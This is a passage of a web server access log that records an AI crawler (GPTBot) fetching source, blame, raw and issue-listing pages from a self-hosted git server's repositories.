"https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" -[17/Feb/2026:18:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" -[17/Feb/2026:18:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py?display=rendered" [Client 74.7.227.38] [Length 11137] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:18:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 10021] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:18:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 10029] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:18:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 15673] [Gzip 9.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 13368] [Gzip 7.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 10029] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 12643] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:18:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 10022] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:18:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 10020] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 2595] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" -[17/Feb/2026:18:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 3572] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:18:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 14864] [Gzip 8.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:18:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 1341] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:18:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 3170] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:18:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 2394] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" -[17/Feb/2026:18:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 15227] [Gzip 7.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:18:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:18:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:18:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:18:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11385] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:18:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11390] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:18:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11386] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:18:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" -[17/Feb/2026:18:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:10:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9995] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:10:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:10:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:10:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:18:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:18:10:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:18:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py?display=source" [Client 74.7.227.38] [Length 13079] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:18:10:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py?display=source" [Client 74.7.227.38] [Length 12475] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:18:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:18:10:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py?display=source" [Client 74.7.227.38] [Length 12505] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:18:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:18:10:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/api_fetcher.py" -[17/Feb/2026:18:10:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py?display=source" [Client 74.7.227.38] [Length 13045] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/investing_fetcher.py" -[17/Feb/2026:18:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10979] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:18:10:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:18:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/usdkrw_fetcher.py" -[17/Feb/2026:18:10:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:18:10:22 